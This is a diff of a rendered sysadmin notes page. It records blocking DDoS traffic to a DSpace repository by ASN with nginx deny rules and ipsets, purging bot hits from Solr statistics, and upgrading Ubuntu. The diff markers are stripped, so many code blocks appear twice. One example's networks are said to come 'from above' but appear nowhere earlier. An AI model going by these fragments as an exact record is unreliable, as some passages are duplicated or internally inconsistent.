<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ips-sorted.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ips-sorted.txt
</span></span><span style="display:flex;"><span>10776 /tmp/ips-sorted.txt
</span></span></code></pre></div><ul>
<li>Then resolve them all:</li>
</ul>
<pre tabindex="0"><code class="language-console:" data-lang="console:">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
</code></pre><ul>
<li>Then get the top ten organizations and top ten ASNs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
213 AMAZON-AES
218 ASN-QUADRANET-GLOBAL
246 Silverstar Invest Limited
347 Ethiopian Telecommunication Corporation
475 DEDIPATH-LLC
504 AS-COLOCROSSING
598 UAB Rakrejus
814 UGB Hosting OU
1010 ST-BGP
1757 Global Layer B.V.
$ csvcut -c <span style="color:#ae81ff">3</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
213 14618
218 8100
246 35624
347 24757
475 35913
504 36352
598 62282
814 206485
1010 46844
1757 49453
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 213 AMAZON-AES
</span></span><span style="display:flex;"><span> 218 ASN-QUADRANET-GLOBAL
</span></span><span style="display:flex;"><span> 246 Silverstar Invest Limited
</span></span><span style="display:flex;"><span> 347 Ethiopian Telecommunication Corporation
</span></span><span style="display:flex;"><span> 475 DEDIPATH-LLC
</span></span><span style="display:flex;"><span> 504 AS-COLOCROSSING
</span></span><span style="display:flex;"><span> 598 UAB Rakrejus
</span></span><span style="display:flex;"><span> 814 UGB Hosting OU
</span></span><span style="display:flex;"><span> 1010 ST-BGP
</span></span><span style="display:flex;"><span> 1757 Global Layer B.V.
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">3</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 213 14618
</span></span><span style="display:flex;"><span> 218 8100
</span></span><span style="display:flex;"><span> 246 35624
</span></span><span style="display:flex;"><span> 347 24757
</span></span><span style="display:flex;"><span> 475 35913
</span></span><span style="display:flex;"><span> 504 36352
</span></span><span style="display:flex;"><span> 598 62282
</span></span><span style="display:flex;"><span> 814 206485
</span></span><span style="display:flex;"><span> 1010 46844
</span></span><span style="display:flex;"><span> 1757 49453
</span></span></code></pre></div><ul>
<li>I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I&rsquo;m concerned about Global Layer because it&rsquo;s a huge ASN that seems to have legit hosts too&hellip;?</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
$ cat AS* | sort | uniq &gt; /tmp/abusive-networks.txt
$ wc -l /tmp/abusive-networks.txt
2276 /tmp/abusive-networks.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
</span></span><span style="display:flex;"><span>$ cat AS* | sort | uniq &gt; /tmp/abusive-networks.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/abusive-networks.txt
</span></span><span style="display:flex;"><span>2276 /tmp/abusive-networks.txt
</span></span></code></pre></div><ul>
<li>Combining with my existing rules and filtering uniques:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
2298
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2298
</span></span></code></pre></div><ul>
<li><a href="https://scamalytics.com/ip/isp/2021-06">According to Scamalytics all these are high risk ISPs</a> (as recently as 2021-06) so I will just keep blocking them</li>
<li>I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through&hellip; sigh</li>
<li>The next thing I need to do is purge all the IPs from Solr using grepcidr&hellip;</li>
@@ -558,12 +558,12 @@ $ wc -l /tmp/abusive-networks.txt
</ul>
</li>
</ul>
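<ul>
<li>That could look something like this, selecting IPs that fall in the abusive networks before purging (file names follow the later steps; a sketch, not what I actually ran):
<pre tabindex="0"><code class="language-console" data-lang="console">$ grepcidr -f /tmp/all-networks-to-block.txt /tmp/all-ips.txt &gt; /tmp/ips-in-abusive-networks.txt
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-in-abusive-networks.txt -p
</code></pre>
</li>
</ul>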
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/all-ips-to-block.txt
$ wc -l /tmp/all-ips-to-block.txt
5095 /tmp/all-ips-to-block.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/all-ips-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/all-ips-to-block.txt
</span></span><span style="display:flex;"><span>5095 /tmp/all-ips-to-block.txt
</span></span></code></pre></div><ul>
<li>Then I added them to the normal ipset we are already using with firewalld
<ul>
<li>I will check again in a few hours and ban more</li>
@@ -571,10 +571,10 @@ $ wc -l /tmp/all-ips-to-block.txt
</li>
<li>I decided to extract the networks from the GeoIP database with <code>resolve-addresses-geoip2.py</code> so I can block them more efficiently than using the 5,000 IPs in an ipset:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/all-networks-to-block.txt
$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
2354
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/all-networks-to-block.txt
</span></span><span style="display:flex;"><span>$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2354
</span></span></code></pre></div><ul>
<li>Combined with the previous networks this brings about 200 more for a total of 2,354 networks
<ul>
<li>I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from <a href="https://www.spamhaus.org/drop/">Spamhaus&rsquo;s DROP and EDROP lists</a>, for example); a sketch of that follows below</li>
@@ -582,51 +582,51 @@ $ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq
</li>
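<li>A rough sketch of that idea, assuming an existing nftables <code>inet filter</code> table and input chain (the set name, temp file, and awk filter are mine):
<pre tabindex="0"><code class="language-console" data-lang="console"># nft add set inet filter spamhaus_drop &#39;{ type ipv4_addr; flags interval; }&#39;
# curl -s https://www.spamhaus.org/drop/drop.txt | awk &#39;!/^;/ {print $1}&#39; &gt; /tmp/drop.txt
# while read -r network; do nft add element inet filter spamhaus_drop &#34;{ $network }&#34;; done &lt; /tmp/drop.txt
# nft add rule inet filter input ip saddr @spamhaus_drop drop
</code></pre>
</li>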
<li>Then I got a list of all the 5,095 IPs from above and used <code>check-spider-ip-hits.sh</code> to purge them from Solr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
...
Total number of bot hits purged: 197116
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Total number of bot hits purged: 197116
</span></span></code></pre></div><ul>
<li>I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level</li>
</ul>
<h2 id="2021-07-20">2021-07-20</h2>
<ul>
<li>Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, it&rsquo;s much higher than I noticed yesterday:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
5643
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5643
</span></span></code></pre></div><ul>
<li>I purged 27,000 more hits from the Solr stats using this new list of IPs with my <code>check-spider-ip-hits.sh</code> script</li>
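<li>Generating that list is the same <code>csvgrep</code> as above without the count (the output file name is an assumption):
<pre tabindex="0"><code class="language-console" data-lang="console">$ csvgrep -c asn -r &#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39; /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ips-to-purge.txt
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
</code></pre>
</li>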
<li>Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips-june-23.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">15</span>
265 GOOGLE,15169
277 Silverstar Invest Limited,35624
280 FACEBOOK,32934
288 SAFARICOM-LIMITED,33771
399 AMAZON-AES,14618
427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
455 Opera Software AS,39832
481 MTN NIGERIA Communication limited,29465
502 DEDIPATH-LLC,35913
506 AS-COLOCROSSING,36352
602 UAB Rakrejus,62282
822 ST-BGP,46844
874 Ethiopian Telecommunication Corporation,24757
912 UGB Hosting OU,206485
1607 Global Layer B.V.,49453
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips-june-23.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
</span></span><span style="display:flex;"><span>$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span> 265 GOOGLE,15169
</span></span><span style="display:flex;"><span> 277 Silverstar Invest Limited,35624
</span></span><span style="display:flex;"><span> 280 FACEBOOK,32934
</span></span><span style="display:flex;"><span> 288 SAFARICOM-LIMITED,33771
</span></span><span style="display:flex;"><span> 399 AMAZON-AES,14618
</span></span><span style="display:flex;"><span> 427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
</span></span><span style="display:flex;"><span> 455 Opera Software AS,39832
</span></span><span style="display:flex;"><span> 481 MTN NIGERIA Communication limited,29465
</span></span><span style="display:flex;"><span> 502 DEDIPATH-LLC,35913
</span></span><span style="display:flex;"><span> 506 AS-COLOCROSSING,36352
</span></span><span style="display:flex;"><span> 602 UAB Rakrejus,62282
</span></span><span style="display:flex;"><span> 822 ST-BGP,46844
</span></span><span style="display:flex;"><span> 874 Ethiopian Telecommunication Corporation,24757
</span></span><span style="display:flex;"><span> 912 UGB Hosting OU,206485
</span></span><span style="display:flex;"><span> 1607 Global Layer B.V.,49453
</span></span></code></pre></div><ul>
<li>Again it was over 5,000 IPs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
5228
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5228
</span></span></code></pre></div><ul>
<li>Interestingly, these seem to be five thousand IP addresses <em>different</em> from those in last weekend&rsquo;s attack, as there are over 10,000 unique ones if I combine them!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
10458
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>10458
</span></span></code></pre></div><ul>
<li>I purged all the (26,000) hits from these new IP addresses from Solr as well</li>
<li>Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)&hellip;
<ul>
@@ -636,30 +636,30 @@ $ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span
</li>
<li>Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ddos-ips.txt
# wc -l /tmp/ddos-ips.txt
54002 /tmp/ddos-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ddos-ips-to-purge.txt
$ wc -l /tmp/ddos-ips-to-purge.txt
10900 /tmp/ddos-ips-to-purge.txt
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/ddos-networks-to-block.txt
$ wc -l /tmp/ddos-networks-to-block.txt
262 /tmp/ddos-networks-to-block.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span>54002 /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>10900 /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/ddos-networks-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-networks-to-block.txt
</span></span><span style="display:flex;"><span>262 /tmp/ddos-networks-to-block.txt
</span></span></code></pre></div><ul>
<li>The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span>https://asn.ipinfo.app/api/text/nginx/AS46844 \
https://asn.ipinfo.app/api/text/nginx/AS206485 \
https://asn.ipinfo.app/api/text/nginx/AS62282 \
https://asn.ipinfo.app/api/text/nginx/AS36352 \
https://asn.ipinfo.app/api/text/nginx/AS35913 \
https://asn.ipinfo.app/api/text/nginx/AS35624 \
https://asn.ipinfo.app/api/text/nginx/AS8100
$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
4007
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>https://asn.ipinfo.app/api/text/nginx/AS46844 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS206485 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS62282 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS36352 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35913 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35624 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS8100
</span></span><span style="display:flex;"><span>$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4007
</span></span></code></pre></div><ul>
<li>I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs</li>
</ul>
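<ul>
<li>On the nginx side these are just <code>deny</code> directives in the abusive networks include, one per network, for example (networks taken from above):
<pre tabindex="0"><code class="language-nginx" data-lang="nginx">deny 45.80.217.0/24;
deny 91.243.191.0/24;
</code></pre>
</li>
</ul>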
<h2 id="2021-07-22">2021-07-22</h2>

View File

@@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server:
I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@@ -122,37 +122,37 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<ul>
<li>First running all existing updates, taking some backups, checking for broken packages, and then rebooting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt update <span style="color:#f92672">&amp;&amp;</span> apt dist-upgrade
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
# check <span style="color:#66d9ef">for</span> any packages with residual configs we can purge
# dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span>
# dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
# dpkg -C
# dpkg -l &gt; 2021-08-01-linode20-dpkg.txt
# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
# reboot
# sed -i <span style="color:#e6db74">&#39;s/bionic/focal/&#39;</span> /etc/apt/sources.list.d/*.list
# <span style="color:#66d9ef">do</span>-release-upgrade
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt dist-upgrade
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span><span style="display:flex;"><span># check <span style="color:#66d9ef">for</span> any packages with residual configs we can purge
</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span>
</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
</span></span><span style="display:flex;"><span># dpkg -C
</span></span><span style="display:flex;"><span># dpkg -l &gt; 2021-08-01-linode20-dpkg.txt
</span></span><span style="display:flex;"><span># tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
</span></span><span style="display:flex;"><span># reboot
</span></span><span style="display:flex;"><span># sed -i <span style="color:#e6db74">&#39;s/bionic/focal/&#39;</span> /etc/apt/sources.list.d/*.list
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">do</span>-release-upgrade
</span></span></code></pre></div><ul>
<li>&hellip; but of course it hit <a href="https://bugs.launchpad.net/ubuntu/+source/libxcrypt/+bug/1903838">the libxcrypt bug</a></li>
